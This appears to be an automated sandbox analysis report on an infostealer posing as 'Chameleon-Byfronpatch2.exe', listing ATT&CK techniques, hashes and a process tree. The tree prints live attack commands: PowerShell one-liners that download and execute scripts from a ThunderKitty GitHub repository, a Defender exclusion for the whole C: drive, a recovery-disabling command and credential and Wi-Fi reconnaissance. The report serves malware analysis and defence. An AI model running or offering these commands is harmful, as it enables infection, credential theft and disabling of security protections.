585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb

Analysis

max time kernel
141s
max time network
109s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
14/08/2024, 12:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Chameleon-Byfronpatch2.exe
Size

9.2MB
MD5

addbf6301c1ea797554a0152da23d5ae
SHA1

01a22ed2bb77ff84546147098348a07bc0eecbc6
SHA256

585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb
SHA512

9507a56c571d1f9ddf67dd9b5200c340416b00bb956c52fa88b8cd2108d5f789cdf5c04d60aa06c5c9bde8bec2e6a324c89435eec57708e1f66fd0a98c767a11
SSDEEP

98304:NLTHcOdLkG6nUDvQlPU68hkY8LdYwTE/zTPy2R0r:mOdLkG9TChA/zLc

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
13	4092	powershell.exe
12	5000	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4784	powershell.exe
5000	powershell.exe
4092	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Drivers\etc\hosts	Chameleon-Byfronpatch2.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4412	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
11	raw.githubusercontent.com
12	raw.githubusercontent.com
13	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
1036	ARP.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	reagentc.exe
File opened for modification	C:\Windows\system32\Recovery	reagentc.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1844	netsh.exe
4364	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
2516	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2484	ipconfig.exe
2516	NETSTAT.EXE
4560	ipconfig.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
5000	powershell.exe
4092	powershell.exe
4784	powershell.exe
5000	powershell.exe
4092	powershell.exe
4784	powershell.exe
4092	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeIncreaseQuotaPrivilege	4092	powershell.exe
Token: SeSecurityPrivilege	4092	powershell.exe
Token: SeTakeOwnershipPrivilege	4092	powershell.exe
Token: SeLoadDriverPrivilege	4092	powershell.exe
Token: SeSystemProfilePrivilege	4092	powershell.exe
Token: SeSystemtimePrivilege	4092	powershell.exe
Token: SeProfSingleProcessPrivilege	4092	powershell.exe
Token: SeIncBasePriorityPrivilege	4092	powershell.exe
Token: SeCreatePagefilePrivilege	4092	powershell.exe
Token: SeBackupPrivilege	4092	powershell.exe
Token: SeRestorePrivilege	4092	powershell.exe
Token: SeShutdownPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeSystemEnvironmentPrivilege	4092	powershell.exe
Token: SeRemoteShutdownPrivilege	4092	powershell.exe
Token: SeUndockPrivilege	4092	powershell.exe
Token: SeManageVolumePrivilege	4092	powershell.exe
Token: 33	4092	powershell.exe
Token: 34	4092	powershell.exe
Token: 35	4092	powershell.exe
Token: 36	4092	powershell.exe
Token: SeIncreaseQuotaPrivilege	4092	powershell.exe
Token: SeSecurityPrivilege	4092	powershell.exe
Token: SeTakeOwnershipPrivilege	4092	powershell.exe
Token: SeLoadDriverPrivilege	4092	powershell.exe
Token: SeSystemProfilePrivilege	4092	powershell.exe
Token: SeSystemtimePrivilege	4092	powershell.exe
Token: SeProfSingleProcessPrivilege	4092	powershell.exe
Token: SeIncBasePriorityPrivilege	4092	powershell.exe
Token: SeCreatePagefilePrivilege	4092	powershell.exe
Token: SeBackupPrivilege	4092	powershell.exe
Token: SeRestorePrivilege	4092	powershell.exe
Token: SeShutdownPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeSystemEnvironmentPrivilege	4092	powershell.exe
Token: SeRemoteShutdownPrivilege	4092	powershell.exe
Token: SeUndockPrivilege	4092	powershell.exe
Token: SeManageVolumePrivilege	4092	powershell.exe
Token: 33	4092	powershell.exe
Token: 34	4092	powershell.exe
Token: 35	4092	powershell.exe
Token: 36	4092	powershell.exe
Token: SeIncreaseQuotaPrivilege	4092	powershell.exe
Token: SeSecurityPrivilege	4092	powershell.exe
Token: SeTakeOwnershipPrivilege	4092	powershell.exe
Token: SeLoadDriverPrivilege	4092	powershell.exe
Token: SeSystemProfilePrivilege	4092	powershell.exe
Token: SeSystemtimePrivilege	4092	powershell.exe
Token: SeProfSingleProcessPrivilege	4092	powershell.exe
Token: SeIncBasePriorityPrivilege	4092	powershell.exe
Token: SeCreatePagefilePrivilege	4092	powershell.exe
Token: SeBackupPrivilege	4092	powershell.exe
Token: SeRestorePrivilege	4092	powershell.exe
Token: SeShutdownPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeSystemEnvironmentPrivilege	4092	powershell.exe
Token: SeRemoteShutdownPrivilege	4092	powershell.exe
Token: SeUndockPrivilege	4092	powershell.exe
Token: SeManageVolumePrivilege	4092	powershell.exe
Token: 33	4092	powershell.exe
Token: 34	4092	powershell.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 4260 wrote to memory of 4620	4260	Chameleon-Byfronpatch2.exe	84
PID 4260 wrote to memory of 4620	4260	Chameleon-Byfronpatch2.exe	84
PID 4260 wrote to memory of 4784	4260	Chameleon-Byfronpatch2.exe	86
PID 4260 wrote to memory of 4784	4260	Chameleon-Byfronpatch2.exe	86
PID 4260 wrote to memory of 5000	4260	Chameleon-Byfronpatch2.exe	87
PID 4260 wrote to memory of 5000	4260	Chameleon-Byfronpatch2.exe	87
PID 4260 wrote to memory of 4092	4260	Chameleon-Byfronpatch2.exe	89
PID 4260 wrote to memory of 4092	4260	Chameleon-Byfronpatch2.exe	89
PID 4260 wrote to memory of 636	4260	Chameleon-Byfronpatch2.exe	92
PID 4260 wrote to memory of 636	4260	Chameleon-Byfronpatch2.exe	92
PID 4260 wrote to memory of 4308	4260	Chameleon-Byfronpatch2.exe	91
PID 4260 wrote to memory of 4308	4260	Chameleon-Byfronpatch2.exe	91
PID 636 wrote to memory of 4892	636	cmd.exe	117
PID 636 wrote to memory of 4892	636	cmd.exe	117
PID 4092 wrote to memory of 5084	4092	powershell.exe	97
PID 4092 wrote to memory of 5084	4092	powershell.exe	97
PID 5000 wrote to memory of 1060	5000	powershell.exe	98
PID 5000 wrote to memory of 1060	5000	powershell.exe	98
PID 5084 wrote to memory of 1584	5084	csc.exe	99
PID 5084 wrote to memory of 1584	5084	csc.exe	99
PID 1060 wrote to memory of 3668	1060	csc.exe	100
PID 1060 wrote to memory of 3668	1060	csc.exe	100
PID 4092 wrote to memory of 1844	4092	powershell.exe	104
PID 4092 wrote to memory of 1844	4092	powershell.exe	104
PID 4092 wrote to memory of 3712	4092	powershell.exe	106
PID 4092 wrote to memory of 3712	4092	powershell.exe	106
PID 3712 wrote to memory of 2228	3712	net.exe	107
PID 3712 wrote to memory of 2228	3712	net.exe	107
PID 4092 wrote to memory of 4412	4092	powershell.exe	108
PID 4092 wrote to memory of 4412	4092	powershell.exe	108
PID 4092 wrote to memory of 2312	4092	powershell.exe	111
PID 4092 wrote to memory of 2312	4092	powershell.exe	111
PID 4092 wrote to memory of 4620	4092	powershell.exe	112
PID 4092 wrote to memory of 4620	4092	powershell.exe	112
PID 4620 wrote to memory of 2172	4620	net.exe	113
PID 4620 wrote to memory of 2172	4620	net.exe	113
PID 4092 wrote to memory of 2484	4092	powershell.exe	114
PID 4092 wrote to memory of 2484	4092	powershell.exe	114
PID 4092 wrote to memory of 4040	4092	powershell.exe	115
PID 4092 wrote to memory of 4040	4092	powershell.exe	115
PID 4040 wrote to memory of 2456	4040	net.exe	116
PID 4040 wrote to memory of 2456	4040	net.exe	116
PID 4092 wrote to memory of 4892	4092	powershell.exe	117
PID 4092 wrote to memory of 4892	4092	powershell.exe	117
PID 4092 wrote to memory of 2516	4092	powershell.exe	118
PID 4092 wrote to memory of 2516	4092	powershell.exe	118
PID 4092 wrote to memory of 1396	4092	powershell.exe	119
PID 4092 wrote to memory of 1396	4092	powershell.exe	119
PID 4092 wrote to memory of 4560	4092	powershell.exe	120
PID 4092 wrote to memory of 4560	4092	powershell.exe	120
PID 4092 wrote to memory of 1984	4092	powershell.exe	121
PID 4092 wrote to memory of 1984	4092	powershell.exe	121
PID 4092 wrote to memory of 1036	4092	powershell.exe	122
PID 4092 wrote to memory of 1036	4092	powershell.exe	122
PID 4092 wrote to memory of 4364	4092	powershell.exe	123
PID 4092 wrote to memory of 4364	4092	powershell.exe	123

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4620	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe
"C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe"
1⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:4260
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:4620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5000
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w5icknxn\w5icknxn.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1060
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA21D.tmp" "c:\Users\Admin\AppData\Local\Temp\w5icknxn\CSC15C0630048B74E0894AE99B56F57B68B.TMP"
      4⤵
      PID:3668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4092
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lk2vdlar\lk2vdlar.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5084
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA21C.tmp" "c:\Users\Admin\AppData\Local\Temp\lk2vdlar\CSCEAF2452C203A460AB8909C58E3A361A7.TMP"
      4⤵
      PID:1584
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1844
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:2228
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4412
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:2312
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4620
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:2172
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:2484
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4040
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:2456
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:4892
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:2516
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:1396
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:4560
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:1984
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:1036
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4364
- C:\Windows\system32\reagentc.exe
  reagentc.exe /disable
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:4308
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:636
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:4892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
104B

MD5
728b15f81e918eef45b1cbe07011d850

SHA1
591fef3e31402a9a808555be6c6943629554c265

SHA256
902b26800a3494041d5c316cc8f521e31f87ae3076344241cd954d3521b7f88e

SHA512
a76aab445c4eb6c2cc3c037eaaa7b49b594fc4f86de8d70c449ebc2048295d8748a96a74676b5fce0fec789e1ef0768e03f320fc0b5b55faca9ec82daf4550dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
502789a8235e033cb31752ce0b128048

SHA1
8767b3e9c4d6cccc62c362582672e55f2889b3aa

SHA256
8a63155ce461cce0cd6ce748834275d2fa4ef69708e5c6d6036fc6dd6b0d87e5

SHA512
2a85aa65035afd119cbb2747985271ed23ff24e2345b00be48b56091467a02df91aefc132cb364d77e51af653119a5f8d63dcec67d16ed9117206b16a58eae66

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA21C.tmp

Filesize
1KB

MD5
e9e1c1736e69e4b6cdaa72993cb53c6f

SHA1
d6c705bb3a8f152300bc3ac013da44f6f0d042fd

SHA256
f2fe2cf8aaf8988f05adcb1c87d2c524e46e595864ac312fd713a2a23856735d

SHA512
8df71435bb644a4df4e2a4e2e780bb19b1811c9db8841abdaf6a2ff020e83597268f8fbd9742c18d29cff9b3261370c77e16f4efa609c96b074d72c6bddea2f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA21D.tmp

Filesize
1KB

MD5
06599a439bac69df7165e5a3358b1b7f

SHA1
f3c5cd3f56ff64b9021bd0d99455975fccb383f3

SHA256
b8654e332d9d2046a26abe5fb741311e96d0ecd27d6b60541138cf56d74912e0

SHA512
6dca0402c99abf999e5edc85a6589e6fcfc7767d98c54da2d87c4c1a6a59f762a84b0290dc47a9158a791282b785b35f226daa1c7df9134e8c72384159704842

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
397KB

MD5
d8aeda731740e8d6bce308060488bfc4

SHA1
8cce610b347daf3030d34625c514cba7e0d5868f

SHA256
0b7575c807acdce641c449c408b4cb7a885084aef38f9cb665b09009d4861a67

SHA512
8d64b19559feab2d51f613ada61b7b5587d669a594535e37a6a91ccf028d675da6aa2eee76ddd17482ad19572ef0c754166e9dadd55eb3bf623c145b64a9f9e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
63KB

MD5
f7816bd52852c4ea1576c150aee4888f

SHA1
4c2daa3a7765b3e58e12b89d32be0e7e903336b4

SHA256
b8bdcc631ed2749ff0eb5fd0e65fc567b8629533ba791b8109ab31448be30277

SHA512
7e031e0017332b70f6c67aa2d6ce43bdd43d1fcfad260d4223618ccd316c4393a52f147295d23d29fc548381b798d360c4d4c61e1118cec19b8eb447f3d803bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mbr1pbve.5qj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\lk2vdlar\lk2vdlar.dll

Filesize
4KB

MD5
727e2b6ef2edf40cd74581e642aff9e8

SHA1
8dbf6e7256f853619e51f278eb027c672b452965

SHA256
4f4de68c8da45552888718bd86046fbd0595989b184f10774063f8dff28044ae

SHA512
5be8c77796b35bdc4c741d34c647ab60ba34618f094fdb4ec2c8614b9039c864eeb880f9225033cd8956ebcefc47137af70918814db5ea6000c5a403a1ca0c23

Download Submit
C:\Users\Admin\AppData\Local\Temp\w5icknxn\w5icknxn.dll

Filesize
4KB

MD5
bbf6ccaf15625114875b0a01607e7e1c

SHA1
74ed4032017017022ca6694155f94c97b3a216ee

SHA256
24be6c3c0e7350fb20f2a82cdfdcae77a5627adda44908637d0d4efc2f9f94de

SHA512
c2a1c6ed72ecbd6d7c92738a76bd391f30d32adaa617809e6b074fe1086b30ef8580cfb5387c7e852d6d8baee925451fb92504f00ae7bc755c6e7fc7f9d6f656

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
33963639fb0ee0d79107103504711c9e

SHA1
b5c525632b94582ac863c600bc613ab658fab61b

SHA256
c2d71376ebf448ca83881ffed011973822c8f755a563b1087214bf571692ad89

SHA512
b61a4f6b3a81aac3dd9a35d837232562c5d927647a639ef6eb728479f947d63f32889371f438b3bbf075ec9bbbe81cd0b06c4647d4329d74eaa4dc979ad6787d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lk2vdlar\CSCEAF2452C203A460AB8909C58E3A361A7.TMP

Filesize
652B

MD5
34e9c51c523420e2b9693c92a4e71ebb

SHA1
bc278ff01ab6fc25b5a12978b072eb678bc8f1e8

SHA256
e560493428ff224c4ed2054acf462ef335c89de5683da73dbc30b907c9feeca1

SHA512
0acc4a6b170f45daa414026a4c92b655dae474014fcdd433beedc6183989f268e9c410dfaa10f41c10f6c223898bbef114617c34c2158302b2547118ddd0f99c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lk2vdlar\lk2vdlar.cmdline

Filesize
369B

MD5
157b467bbe0af8f117db064f81a3f0c1

SHA1
1a594a9ab4f37aecfc9588368c0e3e9384185218

SHA256
70f4a21e002e6bfd5852b8cb4e099ddd707349511e22f72aa3999b81b510c78e

SHA512
d79962c0007e3d54701159c85169a854e17693b75d8a515714b6df865f0c97d16b7ac8acd5951aa02827d262d5a69f43fe11e10ffabdd87635ca20665f1a8ffb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w5icknxn\CSC15C0630048B74E0894AE99B56F57B68B.TMP

Filesize
652B

MD5
195534dae093cb7c6d110fefb06caae3

SHA1
440e0099cc3452bf5463eb0d2fc57aac9793f56c

SHA256
b7bb70c3e2d40728e4bdc187183b4bfda90a290534d1e18ec451a7a10212b871

SHA512
bbdcce1bfec7bdd9e4a929654f333a0ecd1cab68483efe89ba88e31a20cb1b336d72426cf95178c8372f4738395a515c5c79d18521d7af73fc8b7bc87afaca9d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w5icknxn\w5icknxn.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w5icknxn\w5icknxn.cmdline

Filesize
369B

MD5
e4b35391eee24d74e00a4ff00db7ec38

SHA1
5b6809f9806eaa07eb1d2ba2265e9fd2f7e3e0ec

SHA256
4b659a2871321b02262fced94ea5287b486beaaea6934bacbd698da01066291f

SHA512
2385cbef465dad99c1ca39a974ad42975aa396ea28a34bda796440a790283f89fc96f1d4af30cf6fb326f0d02e7f727e8a06ff10f9d95254be0e91c43cf1245f

Download Submit
memory/4092-118-0x0000013BDD460000-0x0000013BDD472000-memory.dmp

Filesize
72KB

Download
memory/4092-64-0x0000013BDC8A0000-0x0000013BDC8A8000-memory.dmp

Filesize
32KB

Download
memory/4092-84-0x0000013BDD490000-0x0000013BDD4B4000-memory.dmp

Filesize
144KB

Download
memory/4092-83-0x0000013BDD490000-0x0000013BDD4BA000-memory.dmp

Filesize
168KB

Download
memory/4092-119-0x0000013BDD440000-0x0000013BDD44A000-memory.dmp

Filesize
40KB

Download
memory/5000-78-0x00007FFEFDC70000-0x00007FFEFE731000-memory.dmp

Filesize
10.8MB

Download
memory/5000-61-0x0000022FF8880000-0x0000022FF8888000-memory.dmp

Filesize
32KB

Download
memory/5000-15-0x00007FFEFDC70000-0x00007FFEFE731000-memory.dmp

Filesize
10.8MB

Download
memory/5000-10-0x0000022FF8750000-0x0000022FF8772000-memory.dmp

Filesize
136KB

Download
memory/5000-68-0x0000022FF93B0000-0x0000022FF9B56000-memory.dmp

Filesize
7.6MB

Download
memory/5000-4-0x00007FFEFDC70000-0x00007FFEFE731000-memory.dmp

Filesize
10.8MB

Download
memory/5000-3-0x00007FFEFDC73000-0x00007FFEFDC75000-memory.dmp

Filesize
8KB

Download